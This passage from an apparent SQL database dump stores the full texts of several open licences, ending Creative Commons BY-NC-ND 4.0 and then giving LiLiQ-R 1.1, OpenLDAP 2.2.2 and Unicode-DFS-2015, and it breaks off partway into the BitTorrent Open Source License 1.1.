By using one of our public licenses, a licensor\ngrants the public permission to use the licensed material under specified\nterms and conditions. If the licensor\'s permission is not necessary for any\nreason–for example, because of any applicable exception or limitation to copyright–then\nthat use is not regulated by the license. Our licenses grant only permissions\nunder copyright and certain other rights that a licensor has authority to\ngrant. Use of the licensed material may still be restricted for other reasons,\nincluding because others have copyright or other rights in the material. A\nlicensor may make special requests, such as asking that all changes be marked\nor described. Although not required by our licenses, you are encouraged to\nrespect those requests where reasonable. More considerations for the public\n: wiki.creativecommons.org/Considerations_for_licensees\n\nCreative Commons Attribution-NonCommercial-NoDerivatives 4.0 International\nPublic License\n\nBy exercising the Licensed Rights (defined below), You accept and agree to\nbe bound by the terms and conditions of this Creative Commons Attribution-NonCommercial-NoDerivatives\n4.0 International Public License (\"Public License\"). To the extent this Public\nLicense may be interpreted as a contract, You are granted the Licensed Rights\nin consideration of Your acceptance of these terms and conditions, and the\nLicensor grants You such rights in consideration of benefits the Licensor\nreceives from making the Licensed Material available under these terms and\nconditions.\n\n \n\n Section 1 – Definitions.\n\na. Adapted Material means material subject to Copyright and Similar Rights\nthat is derived from or based upon the Licensed Material and in which the\nLicensed Material is translated, altered, arranged, transformed, or otherwise\nmodified in a manner requiring permission under the Copyright and Similar\nRights held by the Licensor. For purposes of this Public License, where the\nLicensed Material is a musical work, performance, or sound recording, Adapted\nMaterial is always produced where the Licensed Material is synched in timed\nrelation with a moving image.\n\nb. Copyright and Similar Rights means copyright and/or similar rights closely\nrelated to copyright including, without limitation, performance, broadcast,\nsound recording, and Sui Generis Database Rights, without regard to how the\nrights are labeled or categorized. For purposes of this Public License, the\nrights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.\n\nc. Effective Technological Measures means those measures that, in the absence\nof proper authority, may not be circumvented under laws fulfilling obligations\nunder Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996,\nand/or similar international agreements.\n\nd. Exceptions and Limitations means fair use, fair dealing, and/or any other\nexception or limitation to Copyright and Similar Rights that applies to Your\nuse of the Licensed Material.\n\ne. Licensed Material means the artistic or literary work, database, or other\nmaterial to which the Licensor applied this Public License.\n\nf. Licensed Rights means the rights granted to You subject to the terms and\nconditions of this Public License, which are limited to all Copyright and\nSimilar Rights that apply to Your use of the Licensed Material and that the\nLicensor has authority to license.\n\ng. Licensor means the individual(s) or entity(ies) granting rights under this\nPublic License.\n\nh. NonCommercial means not primarily intended for or directed towards commercial\nadvantage or monetary compensation. For purposes of this Public License, the\nexchange of the Licensed Material for other material subject to Copyright\nand Similar Rights by digital file-sharing or similar means is NonCommercial\nprovided there is no payment of monetary compensation in connection with the\nexchange.\n\ni. Share means to provide material to the public by any means or process that\nrequires permission under the Licensed Rights, such as reproduction, public\ndisplay, public performance, distribution, dissemination, communication, or\nimportation, and to make material available to the public including in ways\nthat members of the public may access the material from a place and at a time\nindividually chosen by them.\n\nj. Sui Generis Database Rights means rights other than copyright resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other essentially equivalent rights anywhere in the world.\n\nk. You means the individual or entity exercising the Licensed Rights under\nthis Public License. Your has a corresponding meaning.\n\n \n\n Section 2 – Scope.\n\n a. License grant.\n\n1. Subject to the terms and conditions of this Public License, the Licensor\nhereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive,\nirrevocable license to exercise the Licensed Rights in the Licensed Material\nto:\n\nA. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial\npurposes only; and\n\nB. produce and reproduce, but not Share, Adapted Material for NonCommercial\npurposes only.\n\n2. Exceptions and Limitations. For the avoidance of doubt, where Exceptions\nand Limitations apply to Your use, this Public License does not apply, and\nYou do not need to comply with its terms and conditions.\n\n 3. Term. The term of this Public License is specified in Section 6(a).\n\n4. Media and formats; technical modifications allowed. The Licensor authorizes\nYou to exercise the Licensed Rights in all media and formats whether now known\nor hereafter created, and to make technical modifications necessary to do\nso. The Licensor waives and/or agrees not to assert any right or authority\nto forbid You from making technical modifications necessary to exercise the\nLicensed Rights, including technical modifications necessary to circumvent\nEffective Technological Measures. For purposes of this Public License, simply\nmaking modifications authorized by this Section 2(a)(4) never produces Adapted\nMaterial.\n\n 5. Downstream recipients.\n\nA. Offer from the Licensor – Licensed Material. Every recipient of the Licensed\nMaterial automatically receives an offer from the Licensor to exercise the\nLicensed Rights under the terms and conditions of this Public License.\n\nB. No downstream restrictions. You may not offer or impose any additional\nor different terms or conditions on, or apply any Effective Technological\nMeasures to, the Licensed Material if doing so restricts exercise of the Licensed\nRights by any recipient of the Licensed Material.\n\n6. No endorsement. Nothing in this Public License constitutes or may be construed\nas permission to assert or imply that You are, or that Your use of the Licensed\nMaterial is, connected with, or sponsored, endorsed, or granted official status\nby, the Licensor or others designated to receive attribution as provided in\nSection 3(a)(1)(A)(i).\n\n b. Other rights.\n\n1. Moral rights, such as the right of integrity, are not licensed under this\nPublic License, nor are publicity, privacy, and/or other similar personality\nrights; however, to the extent possible, the Licensor waives and/or agrees\nnot to assert any such rights held by the Licensor to the limited extent necessary\nto allow You to exercise the Licensed Rights, but not otherwise.\n\n2. Patent and trademark rights are not licensed under this Public License.\n\n3. To the extent possible, the Licensor waives any right to collect royalties\nfrom You for the exercise of the Licensed Rights, whether directly or through\na collecting society under any voluntary or waivable statutory or compulsory\nlicensing scheme. In all other cases the Licensor expressly reserves any right\nto collect such royalties, including when the Licensed Material is used other\nthan for NonCommercial purposes.\n\n \n\n Section 3 – License Conditions.\n\nYour exercise of the Licensed Rights is expressly made subject to the following\nconditions.\n\n a. Attribution.\n\n 1. If You Share the Licensed Material, You must:\n\nA. retain the following if it is supplied by the Licensor with the Licensed\nMaterial:\n\ni. identification of the creator(s) of the Licensed Material and any others\ndesignated to receive attribution, in any reasonable manner requested by the\nLicensor (including by pseudonym if designated);\n\n ii. a copyright notice;\n\n iii. a notice that refers to this Public License;\n\n iv. a notice that refers to the disclaimer of warranties;\n\nv. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;\n\nB. indicate if You modified the Licensed Material and retain an indication\nof any previous modifications; and\n\nC. indicate the Licensed Material is licensed under this Public License, and\ninclude the text of, or the URI or hyperlink to, this Public License.\n\nFor the avoidance of doubt, You do not have permission under this Public License\nto Share Adapted Material.\n\n2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner\nbased on the medium, means, and context in which You Share the Licensed Material.\nFor example, it may be reasonable to satisfy the conditions by providing a\nURI or hyperlink to a resource that includes the required information.\n\n3. If requested by the Licensor, You must remove any of the information required\nby Section 3(a)(1)(A) to the extent reasonably practicable.\n\n \n\n Section 4 – Sui Generis Database Rights.\n\nWhere the Licensed Rights include Sui Generis Database Rights that apply to\nYour use of the Licensed Material:\n\na. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract,\nreuse, reproduce, and Share all or a substantial portion of the contents of\nthe database for NonCommercial purposes only and provided You do not Share\nAdapted Material;\n\nb. if You include all or a substantial portion of the database contents in\na database in which You have Sui Generis Database Rights, then the database\nin which You have Sui Generis Database Rights (but not its individual contents)\nis Adapted Material; and\n\nc. You must comply with the conditions in Section 3(a) if You Share all or\na substantial portion of the contents of the database.\n\nFor the avoidance of doubt, this Section 4 supplements and does not replace\nYour obligations under this Public License where the Licensed Rights include\nother Copyright and Similar Rights.\n\n \n\n Section 5 – Disclaimer of Warranties and Limitation of Liability.\n\na. Unless otherwise separately undertaken by the Licensor, to the extent possible,\nthe Licensor offers the Licensed Material as-is and as-available, and makes\nno representations or warranties of any kind concerning the Licensed Material,\nwhether express, implied, statutory, or other. This includes, without limitation,\nwarranties of title, merchantability, fitness for a particular purpose, non-infringement,\nabsence of latent or other defects, accuracy, or the presence or absence of\nerrors, whether or not known or discoverable. Where disclaimers of warranties\nare not allowed in full or in part, this disclaimer may not apply to You.\n\nb. To the extent possible, in no event will the Licensor be liable to You\non any legal theory (including, without limitation, negligence) or otherwise\nfor any direct, special, indirect, incidental, consequential, punitive, exemplary,\nor other losses, costs, expenses, or damages arising out of this Public License\nor use of the Licensed Material, even if the Licensor has been advised of\nthe possibility of such losses, costs, expenses, or damages. Where a limitation\nof liability is not allowed in full or in part, this limitation may not apply\nto You.\n\nc. The disclaimer of warranties and limitation of liability provided above\nshall be interpreted in a manner that, to the extent possible, most closely\napproximates an absolute disclaimer and waiver of all liability.\n\n \n\n Section 6 – Term and Termination.\n\na. This Public License applies for the term of the Copyright and Similar Rights\nlicensed here. However, if You fail to comply with this Public License, then\nYour rights under this Public License terminate automatically.\n\nb. Where Your right to use the Licensed Material has terminated under Section\n6(a), it reinstates:\n\n1. automatically as of the date the violation is cured, provided it is cured\nwithin 30 days of Your discovery of the violation; or\n\n 2. upon express reinstatement by the Licensor.\n\nFor the avoidance of doubt, this Section 6(b) does not affect any right the\nLicensor may have to seek remedies for Your violations of this Public License.\n\nc. For the avoidance of doubt, the Licensor may also offer the Licensed Material\nunder separate terms or conditions or stop distributing the Licensed Material\nat any time; however, doing so will not terminate this Public License.\n\n d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.\n\n \n\n Section 7 – Other Terms and Conditions.\n\na. The Licensor shall not be bound by any additional or different terms or\nconditions communicated by You unless expressly agreed.\n\nb. Any arrangements, understandings, or agreements regarding the Licensed\nMaterial not stated herein are separate from and independent of the terms\nand conditions of this Public License.\n\n \n\n Section 8 – Interpretation.\n\na. For the avoidance of doubt, this Public License does not, and shall not\nbe interpreted to, reduce, limit, restrict, or impose conditions on any use\nof the Licensed Material that could lawfully be made without permission under\nthis Public License.\n\nb. To the extent possible, if any provision of this Public License is deemed\nunenforceable, it shall be automatically reformed to the minimum extent necessary\nto make it enforceable. If the provision cannot be reformed, it shall be severed\nfrom this Public License without affecting the enforceability of the remaining\nterms and conditions.\n\nc. No term or condition of this Public License will be waived and no failure\nto comply consented to unless expressly agreed to by the Licensor.\n\nd. Nothing in this Public License constitutes or may be interpreted as a limitation\nupon, or waiver of, any privileges and immunities that apply to the Licensor\nor You, including from the legal processes of any jurisdiction or authority.\n\nCreative Commons is not a party to its public licenses. Notwithstanding, Creative\nCommons may elect to apply one of its public licenses to material it publishes\nand in those instances will be considered the \"Licensor.\" The text of the\nCreative Commons public licenses is dedicated to the public domain under the\nCC0 Public Domain Dedication. Except for the limited purpose of indicating\nthat material is shared under a Creative Commons public license or as otherwise\npermitted by the Creative Commons policies published at creativecommons.org/policies,\nCreative Commons does not authorize the use of the trademark \"Creative Commons\"\nor any other trademark or logo of Creative Commons without its prior written\nconsent including, without limitation, in connection with any unauthorized\nmodifications to any of its public licenses or any other arrangements, understandings,\nor agreements concerning use of licensed material. For the avoidance of doubt,\nthis paragraph does not form part of the public licenses.\n\nCreative Commons may be contacted at creativecommons.org.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(248,'LiLiQ-R-1.1','Licence Libre du Québec – Réciprocité (LiLiQ-R)\n\nVersion 1.1\n\n 1. Préambule\n\nCette licence s\'applique à tout logiciel distribué dont le titulaire du droit\nd\'auteur précise qu\'il est sujet aux termes de la Licence Libre du Québec\n– Réciprocité (LiLiQ-R) (ci-après appelée la « licence »).\n\n 2. Définitions\n\nDans la présente licence, à moins que le contexte n\'indique un sens différent,\non entend par:\n\n« concédant » : le titulaire du droit d\'auteur sur le logiciel, ou toute personne\ndûment autorisée par ce dernier à accorder la présente licence;\n\n« contributeur » : le titulaire du droit d\'auteur ou toute personne autorisée\npar ce dernier à soumettre au concédant une contribution. Un contributeur\ndont sa contribution est incorporée au logiciel est considéré comme un concédant\nen regard de sa contribution;\n\n« contribution » : tout logiciel original, ou partie de logiciel original\nsoumis et destiné à être incorporé dans le logiciel;\n\n « distribution » : le fait de délivrer une copie du logiciel;\n\n« licencié » : toute personne qui possède une copie du logiciel et qui exerce\nles droits concédés par la licence;\n\n« logiciel » : une œuvre protégée par le droit d\'auteur, telle qu\'un programme\nd\'ordinateur et sa documentation, pour laquelle le titulaire du droit d\'auteur\na précisé qu\'elle est sujette aux termes de la présente licence;\n\n« logiciel dérivé » : tout logiciel original réalisé par un licencié, autre\nque le logiciel ou un logiciel modifié, qui produit ou reproduit la totalité\nou une partie importante du logiciel;\n\n« logiciel modifié » : toute modification par un licencié de l\'un des fichiers\nsource du logiciel ou encore tout nouveau fichier source qui incorpore le\nlogiciel ou une partie importante de ce dernier.\n\n 3. Licence de droit d\'auteur\n\nSous réserve des termes de la licence, le concédant accorde au licencié une\nlicence non exclusive et libre de redevances lui permettant d\'exercer les\ndroits suivants sur le logiciel :\n\n 1 Produire ou reproduire la totalité ou une partie importante;\n\n2 Exécuter ou représenter la totalité ou une partie importante en public;\n\n 3 Publier la totalité ou une partie importante.\n\n \n\n Cette licence est accordée sans limite territoriale et sans limite de temps.\n\nL\'exercice complet de ces droits est sujet à la distribution par le concédant\ndu code source du logiciel, lequel doit être sous une forme permettant d\'y\napporter des modifications. Le concédant peut aussi distribuer le logiciel\naccompagné d\'une offre de distribuer le code source du logiciel, sans frais\nsupplémentaires, autres que ceux raisonnables afin de permettre la livraison\ndu code source. Cette offre doit être valide pendant une durée raisonnable.\n\n 4. Distribution\n\nLe licencié peut distribuer des copies du logiciel, d\'un logiciel modifié\nou dérivé, sous réserve de respecter les conditions suivantes :\n\n 1 Le logiciel doit être accompagné d\'un exemplaire de cette licence;\n\n2 Si le logiciel a été modifié, le licencié doit en faire la mention, de\npréférence dans chacun des fichiers modifiés dont la nature permet une telle\nmention;\n\n3 Les étiquettes ou mentions faisant état des droits d\'auteur, des marques\nde commerce, des garanties ou de la paternité concernant le logiciel ne doivent\npas être modifiées ou supprimées, à moins que ces étiquettes ou mentions ne\nsoient inapplicables à un logiciel modifié ou dérivé donné.\n\n 4.1. Réciprocité\n\nChaque fois que le licencié distribue le logiciel, le concédant offre au récipiendaire\nune concession sur le logiciel selon les termes de la présente licence. Le\nlicencié doit offrir une concession selon les termes de la présente licence\npour tout logiciel modifié qu\'il distribue.\n\nChaque fois que le licencié distribue le logiciel ou un logiciel modifié,\nce dernier doit assumer l\'obligation d\'en distribuer le code source, de la\nmanière prévue au troisième alinéa de l\'article 3.\n\n 4.2. Compatibilité\n\nDans la mesure où le licencié souhaite distribuer un logiciel modifié combiné\nà un logiciel assujetti à une licence compatible, mais dont il ne serait pas\npossible d\'en respecter les termes, le concédant offre, en plus de la présente\nconcession, une concession selon les termes de cette licence compatible.\n\nUn licencié qui est titulaire exclusif du droit d\'auteur sur le logiciel assujetti\nà une licence compatible ne peut pas se prévaloir de cette offre. Il en est\nde même pour toute autre personne dûment autorisée à sous-licencier par le\ntitulaire exclusif du droit d\'auteur sur le logiciel assujetti à une licence\ncompatible.\n\nEst considérée comme une licence compatible toute licence libre approuvée\nou certifiée par la Free Software Foundation ou l\'Open Source Initiative,\ndont le niveau de réciprocité est comparable ou supérieur à celui de la présente\nlicence, sans toutefois être moindre, notamment :\n\n 1 Common Development and Distribution License (CDDL-1.0)\n\n 2 Common Public License Version 1.0 (CPL-1.0)\n\n 3 Contrat de licence de logiciel libre CeCILL, version 2.1 (CECILL-2.1)\n\n 4 Contrat de licence de logiciel libre CeCILL-C (CECILL-C)\n\n 5 Eclipse Public License - v 1.0 (EPL-1.0)\n\n 6 European Union Public License, version 1.1 (EUPL v. 1.1)\n\n 7 Licence Libre du Québec – Réciprocité forte version 1.1 (LiLiQ-R+ 1.1)\n\n 8 GNU General Public License Version 2 (GNU GPLv2)\n\n 9 GNU General Public License Version 3 (GNU GPLv3)\n\n 10 GNU Lesser General Public License Version 2.1 (GNU LGPLv2.1)\n\n 11 GNU Lesser General Public License Version 3 (GNU LGPLv3)\n\n 12 Mozilla Public License Version 2.0 (MPL-2.0)\n\n 5. Contributions\n\nSous réserve d\'une entente distincte, toute contribution soumise par un contributeur\nau concédant pour inclusion dans le logiciel sera soumise aux termes de cette\nlicence.\n\n 6. Marques de commerce\n\nLa licence n\'accorde aucune permission particulière qui permettrait d\'utiliser\nles marques de commerce du concédant, autre que celle requise permettant d\'identifier\nla provenance du logiciel.\n\n 7. Garanties\n\nSauf mention contraire, le concédant distribue le logiciel sans aucune garantie,\naux risques et périls de l\'acquéreur de la copie du logiciel, et ce, sans\nassurer que le logiciel puisse répondre à un besoin particulier ou puisse\ndonner un résultat quelconque.\n\nSans lier le concédant d\'une quelconque manière, rien n\'empêche un licencié\nd\'offrir ou d\'exclure des garanties ou du support.\n\n 8. Responsabilité\n\nLe licencié est responsable de tout préjudice résultant de l\'exercice des\ndroits accordés par la licence.\n\nLe concédant ne saurait être tenu responsable du préjudice subi par le licencié\nou par des tiers, pour quelque cause que ce soit en lien avec la licence et\nles droits qui y sont accordés.\n\n 9. Résiliation\n\nLa présente licence est résiliée de plein droit dès que les droits qui y sont\naccordés ne sont pas exercés conformément aux termes qui y sont stipulés.\n\nToutefois, si le défaut est corrigé dans un délai de 30 jours de sa prise\nde connaissance par la personne en défaut, et qu\'il s\'agit du premier défaut,\nla licence est accordée de nouveau.\n\nPour tout défaut subséquent, le consentement exprès du concédant est nécessaire\nafin que la licence soit accordée de nouveau.\n\n 10. Version de la licence\n\nLe Centre de services partagés du Québec, ses ayants cause ou toute personne\nqu\'il désigne, peuvent diffuser des versions révisées ou modifiées de cette\nlicence. Chaque version recevra un numéro unique. Si un logiciel est déjà\nsoumis aux termes d\'une version spécifique, c\'est seulement cette version\nqui liera les parties à la licence.\n\nLe concédant peut aussi choisir de concéder la licence sous la version actuelle\nou toute version ultérieure, auquel cas le licencié peut choisir sous quelle\nversion la licence lui est accordée.\n\n 11. Divers\n\nDans la mesure où le concédant est un ministère, un organisme public ou une\npersonne morale de droit public, créés en vertu d\'une loi de l\'Assemblée nationale\ndu Québec, la licence est régie par le droit applicable au Québec et en cas\nde contestation, les tribunaux du Québec seront seuls compétents.\n\nLa présente licence peut être distribuée sans conditions particulières. Toutefois,\nune version modifiée doit être distribuée sous un nom différent. Toute référence\nau Centre de services partagés du Québec, et, le cas échéant, ses ayant droit,\ndoit être retirée, autre que celle permettant d\'identifier la provenance de\nla licence.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(249,'OLDAP-2.2.2','The OpenLDAP Public License\n\nVersion 2.2.2, 28 July 2000\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\n\n2. Redistributions in binary form must reproduce applicable copyright statements\nand notices, this list of conditions, and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution.\n\n 3. Redistributions must contain a verbatim copy of this document.\n\n4. The name \"OpenLDAP\" must not be used to endorse or promote products derived\nfrom this Software without prior written permission of the OpenLDAP Foundation.\n\n5. Products derived from this Software may not be called \"OpenLDAP\" nor may\n\"OpenLDAP\" appear in their names without prior written permission of the OpenLDAP\nFoundation.\n\n6. Due credit should be given to the OpenLDAP Project (http://www.openldap.org/).\n\n7. The OpenLDAP Foundation may revise this license from time to time. Each\nrevision is distinguished by a version number. You may use the Software under\nterms of this license revision or under the terms of any subsequent revision\nof the license.\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nOpenLDAP is a trademark of the OpenLDAP Foundation.\n\nCopyright 1999-2000 The OpenLDAP Foundation, Redwood City, California, USA.\nAll Rights Reserved. Permission to copy and distributed verbatim copies of\nthis document is granted.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(250,'Unicode-DFS-2015','UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE\n\nUnicode Data Files include all data files under the directories http://www.unicode.org/Public/,\nhttp://www.unicode.org/reports/, and http://www.unicode.org/cldr/data/. Unicode\nData Files do not include PDF online code charts under the directory http://www.unicode.org/Public/.\nSoftware includes any source code published in the Unicode Standard or under\nthe directories http://www.unicode.org/Public/, http://www.unicode.org/reports/,\nand http://www.unicode.org/cldr/data/.\n\nNOTICE TO USER: Carefully read the following legal agreement. BY DOWNLOADING,\nINSTALLING, COPYING OR OTHERWISE USING UNICODE INC.\'S DATA FILES (\"DATA FILES\"),\nAND/OR SOFTWARE (\"SOFTWARE\"), YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND\nBY, ALL OF THE TERMS AND CONDITIONS OF THIS AGREEMENT. IF YOU DO NOT AGREE,\nDO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE THE DATA FILES OR SOFTWARE.\n\nCOPYRIGHT AND PERMISSION NOTICE\n\nCopyright © 1991-2015 Unicode, Inc. All rights reserved. Distributed under\nthe Terms of Use in http://www.unicode.org/copyright.html.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof the Unicode data files and any associated documentation (the \"Data Files\")\nor Unicode software and any associated documentation (the \"Software\") to deal\nin the Data Files or Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, and/or sell copies\nof the Data Files or Software, and to permit persons to whom the Data Files\nor Software are furnished to do so, provided that\n\n(a) this copyright and permission notice appear with all copies of the Data\nFiles or Software,\n\n(b) this copyright and permission notice appear in associated documentation,\nand\n\n(c) there is clear notice in each modified Data File or in the Software as\nwell as in the documentation associated with the Data File(s) or Software\nthat the data or software has been modified.\n\nTHE DATA FILES AND SOFTWARE ARE PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY\nKIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS.\nIN NO EVENT SHALL THE COPYRIGHT HOLDER OR HOLDERS INCLUDED IN THIS NOTICE\nBE LIABLE FOR ANY CLAIM, OR ANY SPECIAL INDIRECT OR CONSEQUENTIAL DAMAGES,\nOR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER\nIN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT\nOF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THE DATA FILES OR SOFTWARE.\n\nExcept as contained in this notice, the name of a copyright holder shall not\nbe used in advertising or otherwise to promote the sale, use or other dealings\nin these Data Files or Software without prior written authorization of the\ncopyright holder.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(251,'BitTorrent-1.1','BitTorrent Open Source License\n\nVersion 1.1\n\nThis BitTorrent Open Source License (the \"License\") applies to the BitTorrent\nclient and related software products as well as any updates or maintenance\nreleases of that software (\"BitTorrent Products\") that are distributed by\nBitTorrent, Inc. (\"Licensor\"). Any BitTorrent Product licensed pursuant to\nthis License is a Licensed Product. Licensed Product, in its entirety, is\nprotected by U.S. copyright law. This License identifies the terms under which\nyou may use, copy, distribute or modify Licensed Product.\n\nPreamble\n\nThis Preamble is intended to describe, in plain English, the nature and scope\nof this License. However, this Preamble is not a part of this license. The\nlegal effect of this License is dependent only upon the terms of the License\nand not this Preamble.\n\nThis License complies with the Open Source Definition and is derived from\nthe Jabber Open Source License 1.0 (the \"JOSL\"), which has been approved by\nOpen Source Initiative. Sections 4(c) and 4(f)(iii) from the JOSL have been\ndeleted.\n\nThis License provides that:\n\n1. You may use or give away the Licensed Product, alone or as a component\nof an aggregate software distribution containing programs from several different\nsources. No royalty or other fee is required.\n\n2. Both Source Code and executable versions of the Licensed Product, including\nModifications made by previous Contributors, are available for your use. (The\nterms \"Licensed Product,\" \"Modifications,\" \"Contributors\" and \"Source Code\"\nare defined in the License.)\n\n3. You are allowed to make Modifications to the Licensed Product, and you\ncan create Derivative Works from it. (The term \"Derivative Works\" is defined\nin the License.)\n\n4. By accepting the Licensed Product under the provisions of this License,\nyou agree that any Modifications you make to the Licensed Product and then\ndistribute are governed by the provisions of this License. In particular,\nyou must make the Source Code of your Modifications available to others free\nof charge and without a royalty.\n\n5. You may sell, accept donations or otherwise receive compensation for executable\nversions of a Licensed Product, without paying a royalty or other fee to the\nLicensor or any Contributor, provided that such executable versions contain\nyour or another Contributor\'s material Modifications. For the avoidance of\ndoubt, to the extent your executable version of a Licensed Product does not\ncontain your or another Contributor\'s material Modifications, you may not\nsell, accept donations or otherwise receive compensation for such executable.\n\nYou may use the Licensed Product for any purpose, but the Licensor is not\nproviding you any warranty whatsoever, nor is the Licensor accepting any liability\nin the event that the Licensed Product doesn\'t work properly or causes you\nany injury or damages.\n\n6. If you sublicense the Licensed Product or Derivative Works, you may charge\nfees for warranty or support, or for accepting indemnity or liability obligations\nto your customers. You cannot charge for, sell, accept donations or otherwise\nreceive compensation for the Source Code.\n\n7. If you assert any patent claims against the Licensor relating to the Licensed\nProduct, or if you breach any terms of the License, your rights to the Licensed\nProduct under this License automatically terminate.\n\nYou may use this License to distribute your own Derivative Works, in which\ncase the provisions of this License will apply to your Derivative Works just\nas they do to the original Licensed Product.\n\nAlternatively, you may distribute your Derivative Works under any other OSI-approved\nOpen Source license, or under a proprietary license of your choice. If you\nuse any license other than this License, however, you must continue to fulfill\nthe requirements of this License (including the provisions relating to publishing\nthe Source Code) for those portions of your Derivative Works that consist\nof the Licensed Product, including the files containing\n\nModifications.\n\nNew versions of this License may be published from time to time in connection\nwith new versions of a Licensed Product or otherwise. You may choose to continue\nto use the license terms in this version of the License for the Licensed Product\nthat was originally licensed hereunder, however, the new versions of this\nLicense will at all times apply to new versions of the Licensed Product released\nby Licensor after the release of the new version of this License. Only the\nLicensor has the right to change the License terms as they apply to the Licensed\nProduct.\n\nThis License relies on precise definitions for certain terms. Those terms\nare defined when they are first used, and the definitions are repeated for\nyour convenience in a Glossary at the end of the License.\n\nLicense Terms\n\n1. Grant of License From Licensor. Subject to the terms and conditions of\nthis License, Licensor hereby grants you a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims, to do the following:\n\na. Use, reproduce, modify, display, perform, sublicense and distribute any\nModifications created by a Contributor or portions thereof, in both Source\nCode or as an executable program, either on an unmodified basis or as part\nof Derivative Works.\n\nb. Under claims of patents now or hereafter owned or controlled by Contributor,\nto make, use, sell, offer for sale, have made, and/or otherwise dispose of\nModifications or portions thereof, but solely to the extent that any such\nclaim is necessary to enable you to make, use, sell, offer for sale, have\nmade, and/or otherwise dispose of Modifications or portions thereof or Derivative\nWorks thereof.\n\n2. Grant of License to Modifications From Contributor. \"Modifications\" means\nany additions to or deletions from the substance or structure of (i) a file\ncontaining a Licensed Product, or (ii) any new file that contains any part\nof a Licensed Product. Hereinafter in this License, the term \"Licensed Product\"\nshall include all previous Modifications that you receive from any Contributor.\nSubject to the terms and conditions of this License, By application of the\nprovisions in Section 4(a) below, each person or entity who created or contributed\nto the creation of, and distributed, a Modification (a \"Contributor\") hereby\ngrants you a world-wide, royalty-free, non-exclusive license, subject to third\nparty intellectual property claims, to do the following:\n\na. Use, reproduce, modify, display, perform, sublicense and distribute any\nModifications created by such Contributor or portions thereof, in both Source\nCode or as an executable program, either on an unmodified basis or as part\nof Derivative Works.\n\nb. Under claims of patents now or hereafter owned or controlled by Contributor,\nto make, use, sell, offer for sale, have made, and/or otherwise dispose of\nModifications or portions thereof, but solely to the extent that any such\nclaim is necessary to enable you to make, use, sell, offer for sale, have\nmade, and/or otherwise dispose of Modifications or portions thereof or Derivative\nWorks thereof.\n\n3. Exclusions From License Grant. Nothing in this License shall be deemed\nto grant any rights to trademarks, copyrights, patents, trade secrets or any\nother intellectual property of Licensor or any Contributor except as expressly\nstated herein. No patent license is granted separate from the Licensed Product,\nfor code that you delete from the Licensed Product, or for combinations of\nthe Licensed Product with other software or hardware. No right is granted\nto the trademarks of Licensor or any Contributor even if such marks are included\nin the Licensed Product. Nothing in this License shall be interpreted to prohibit\nLicensor from licensing under different terms from this License any code that\nLicensor otherwise would have a right to license. As an express condition\nfor your use of the Licensed Product, you hereby agree that you will not,\nwithout the prior written consent of Licensor, use any trademarks, copyrights,\npatents, trade secrets or any other intellectual property of Licensor or any\nContributor except as expressly stated herein. For the avoidance of doubt\nand without limiting the foregoing, you hereby agree that you will not use\nor display any trademark of Licensor or any Contributor in any domain name,\ndirectory filepath, advertisement, link or other reference to you in any manner\nor in any media.\n\n 4. Your Obligations Regarding Distribution.\n\na. Application of This License to Your Modifications. As an express condition\nfor your use of the Licensed Product, you hereby agree that any Modifications\nthat you create or to which you contribute, and which you distribute, are\ngoverned by the terms of this License including, without limitation, Section\n2. Any Modifications that you create or to which you contribute may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 7. You must include a copy of this License with every copy of\nthe Modifications you distribute. You agree not to offer or impose any terms\non any Source Code or executable version of the Licensed Product or Modifications\nthat alter or restrict the applicable version of this License or the recipients\'\nrights hereunder. However, you may include an additional document offering\nthe additional rights described in Section 4(d).\n\nb. Availability of Source Code. You must make available, without charge, 